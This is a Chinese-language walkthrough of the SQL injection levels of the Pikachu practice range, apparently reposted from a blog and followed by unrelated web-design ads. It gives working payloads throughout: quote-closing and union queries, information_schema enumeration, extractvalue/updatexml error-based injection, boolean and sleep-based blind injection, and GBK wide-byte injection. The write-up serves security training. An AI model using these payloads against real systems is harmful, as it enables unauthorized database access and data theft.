pick靶場-sql注入
甲.数字型注入
数字型注入一般提交值沒有引號,所以直接在後面構造語句就可以了。
抓包查看
構造語句
提交后
該數據庫表內容被爆出來了。
乙.字符型注入
首先我們要知道一點,字符串在數據庫中提交是需要用引號將字符串包含的。所以字符型注入一般需要用到引號來閉合字符串,閉合引號后就可以接執行的sql語句,就可以執行。
name=’kobe’
這時候需要構造語句 ‘or 1=1# 單引號是為了閉合1前面的單引號,#是為了註釋掉後面語句
這裏輸入kobe提交后显示了uid和email,猜測語句是 select uid,email from 表 where username=’輸入的值’
這裏要構造語句,輸入的值變成’or 1=1#。那麼查詢語句就是select uid,email from 表 where username=”or 1=1#’
閉合單引號后,把後面一個單引號註釋掉。
嘗試讀取數據庫信息。
使用order by 猜表字段數
表字段數為2,開始構造語句
database() 數據庫名
version() 數據庫版本
user()
22′ union select database(),user()#
這裏了解下mysql中information_schema數據庫,他可以幫助我們查詢更多信息。
Mysql 5.0以上中,information_schema數據庫會記錄當前數據庫信息。
information_schema.tables 表名信息
information_schema.columns 列名信息
Table_name 表名
Column_name 列名
Table_schema 數據庫名
group_concat用來合併多條數據記錄,可用來合併結果。
因此,查詢當前數據庫下錶名可以使用(group_concat使用與否均可,主要看返回信息。)
group_concat(table_name) from information_schema.tables where table_schema = database()
查詢表中列名
group_concat(column_name) from information_schema.columns where table_name = ‘列名’、
丙.搜索型注入
搜索框中的數據庫語句一般是採用的查詢語句,這裏我們先了解下sql查詢語句
SQL提供了四種匹配模式:% _ [ ] [^ ]
1. %
%表示模糊匹配0或多個字符,如以下查詢語句:
select * from user where name like ‘%三%’; 這個語句將會把name中帶有“三”的信息全部查找出來
select * from user where name like ‘%三’ ; 這個語句將會把name中最右邊帶有“三”的信息全部查找出來
select * from user where name like ‘三%’ ; 這個語句將會把name中最左邊帶有“三”的信息全部查找出來
2. _
_表示任意單個字符,如以下語句:
select * from user where name like ‘_三_’; 這個語句會匹配出“二三四”
select * from user where name like ‘__三’; 這個語句會匹配出“一二三”
3. [ ]
[ ]表示括號內所列字符中的一個(類似於正則表達式),如以下語句:
select * from user where name like ‘老[大二三]’; 如果都存在的話將找出“老大”、“老二”、“老三”
同時支持縮寫0-9、a-z等。
4.[^ ]
類似於正則表達式,將括號內的元素排除,如以下語句:
select * from user where name like ‘[0-3]個’ 將會檢索出除了“0個”,“1個”,“2個”,“3個”
————————————————
版權聲明:本文為CSDN博主「MuffinFish」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/qq_36113598/article/details/79372493
看題目,首先輸入ko,能夠查詢出來
再輸入ob,也可以查詢出來
很明顯,這裏使用的語句,應該是%這種類型的模糊查詢方式。
猜測語句是select username,uid,email from 表 where username=’%輸入的值%’
構造語句,直接使用’or 1=1#
‘閉合掉字符串,然後使用#註釋掉後面的%’
sql語句很靈活,閉合前一個語句后,可以使用聯合查詢查詢數據庫信息,比如’union select user(),2,3#
丁.xx注入
先試一試’union select 1,2#
報錯显示You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3#’)’ at line 1
發現我們寫的語句後面有個引號和括號,嘗試構造語句閉合
‘) union select 1,2,3#
報錯select列的數量不匹配,說明執行了我們構造的語句。嘗試改成’) union select 1,2#
爆表數據就要用 ‘)or 1=1#
戊.insert/update注入
insert/update/delete注入
在這3種情況中,我們不能使用 union 去做聯合查詢,因為這不是查詢,而是操作。首先猜測語句類型,是查詢類的可以通過union語句來查詢。
首先,添加用戶的地方是對數據庫表進行寫入操作。
我們要了解,sql中寫入新數據,用的語句是
INSERT INTO 表名稱 VALUES (值1, 值2,….)
我們也可以指定所要插入數據的列:
INSERT INTO table_name (列1, 列2,…) VALUES (值1, 值2,….)
使提交報錯也印證了語句是用是insert into語句
首先要了解insert注入一般使用的語句
extractvalue(1,concat(0x7e,(database()))) and ‘1’=’1′
extractvalue() :對XML文檔進行查詢的函數
語法:extractvalue(目標xml文檔,xml路徑)
第二個參數 xml中的位置是可操作的地方,xml文檔中查找字符位置是用 /xxx/xxx/xxx/…這種格式,如果我們寫入其他格式,就會報錯,並且會返回我們寫入的非法格式內容,而這個非法的內容就是我們想要查詢的內容。
正常查詢 第二個參數的位置格式 為 /xxx/xx/xx/xx ,即使查詢不到也不會報錯
concat函數是mysql的字符串連接函數
裏面可以執行sql語句
select concat(0x7e,(select user()) ,0x7e)
驗證結果:16進制也能被自動轉義(0x7e是 ~符號)
下面故意寫入語法錯誤:
select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))
https://blog.csdn.net/zpy1998zpy/article/details/80631036
就是使extractvalue函數中第二個參數變成~select detabase(),這樣與extractvalue函數規定的語法不同,就會引起報錯。
在寫入數據的地方使用構造語句
ttt’and extractvalue(1,concat(0x7e,(database()))) and ‘1’=’1
updatexml()
做數據修改的時候會存在update注入的地方
updatexml()函數與extractvalue()類似,是更新xml文檔的函數。
語法updatexml(目標xml文檔,xml路徑,更新的內容)
報錯語句為
select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))
構造語句
aa’ and updatexml(1,concat(0x7e,(database())),1) and ‘1’=’1
其實也可以使用extractvalue(),只要有報錯,會執行我們構造的語句就成。
己.delete注入
sql中刪除數據一般使用
DELETE 語句
DELETE 語句用於刪除表中的行。
語法
DELETE FROM 表名稱 WHERE 列名稱 = 值
點擊刪除
抓包看
刪除的列名為id,值為59。不為字符串,可直接構造語句
and extractvalue(1,concat(0x7e,(database())))
url上改直接輸入
改數據包需要使用空格實體或者+
庚.http header
web滲透很多地方都涉及到數據包頭部的改寫,我這裏就不多說。
這題很坑的地方在於,不了解後端代碼是怎麼寫的做起來很彆扭,因為這題目要显示出包頭的信息根本不需要將包頭信息存儲在數據庫中。代碼里倒是寫進數據庫了,但後面調用是直接讀前端獲取到的頭部信息,沒有從數據庫中讀取,可能作者是想做個類似訪問記錄的東西。
辛.boolian盲注
根據返回信息判斷語句是否正確。
基於真假的盲注主要特徵
- 沒有報錯信息
- 不管是正確的輸入,還是錯誤的輸入,都只有兩種情況(可以看做 0 or 1)
- 在正確的輸入下,後面跟 and 1=1 / and 1=2 進行判斷
kobe’ and 1=1#
kobe’ and 1=2#
發現一條正確執行,一條显示用戶名不存在,說明後台存在 SQL 注入漏洞
length(database()) 判斷 數據庫名稱的長度
kobe’ and length(database()) >5#
SUBSTR函數
substr(database(), 1, 1) 截取數據庫名稱第一個字符
ascii(substr(database(), 1, 1)) 截取數據庫名稱第一個字符,轉換成ascii值
kobe’ and ascii(substr(database(), 1, 1)) > 105# 判斷數據庫名稱第一個字符ascii值的大小
判斷出數據庫名稱后可以使用substr(database(),1,1)=’字母’#
進行爆破,然後substr(database(),2,1)=’字母’#依次爆破,得出完整數據庫名。
這裏簡要說明下SUBSTR函數:
SUBSTR函數是用來截取數據庫某一列字段中的一部分。
在各個數據庫的函數名稱不一樣
MySQL: SUBSTR( ), SUBSTRING( )
Oracle: SUBSTR( )
SQL Server: SUBSTRING( ) ;
常用的方式是:
SBUSTR(str,pos);
就是從pos開始的位置,一直截取到最後。
還有一種比較常用的是:
SUBSTR(str,pos,len);
這種表示的意思是,就是從pos開始的位置,截取len個字符(空白也算字符)。
需要注意的是:如果pos為1(而不是0),表示從第一個位置開始。
————————————————
版權聲明:SUBSTR函數說明為CSDN博主「呼嘯」的原創,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/howlaa/article/details/16825761
壬.延時盲注
構造語句,使語句提交操作延時,來判斷構造的語句是否正確。
kobe’ and sleep(3)#
該語句表示如果存在kobe,則延時提交3秒。
根據這個方法,可以組合其他語句來猜解當前數據庫信息。
lili’ and if(substr(database(),1,1)=’p’,sleep(5),1)#
盲注可以通過爆破來輔助猜解,具體參考https://www.cnblogs.com/paperpen/p/12324363.html
癸.寬字節注入
寬字節注入是因為數據庫使用了GBK編碼,多字節的編碼,兩個字節代表一個漢字。
注入中單引號存在被反斜杠轉義的情況。\’,其中\的十六進制是 %5C。%df’被轉義成%df\’,就變成了%df\’=%df%5c%27,%df%5c 是一個寬字符,也就是縗,也就是說:%df\’ = %df%5c%27=縗’。單引號就可以按照初期想法被識別。
構造語句kobe%df%27 or 1=1#,通過網頁修改無效,直接修改數據包,成功。
本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理
【其他文章推薦】
※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!
※網頁設計公司推薦不同的風格,搶佔消費者視覺第一線
※Google地圖已可更新顯示潭子電動車充電站設置地點!!
※廣告預算用在刀口上,台北網頁設計公司幫您達到更多曝光效益
※別再煩惱如何寫文案,掌握八大原則!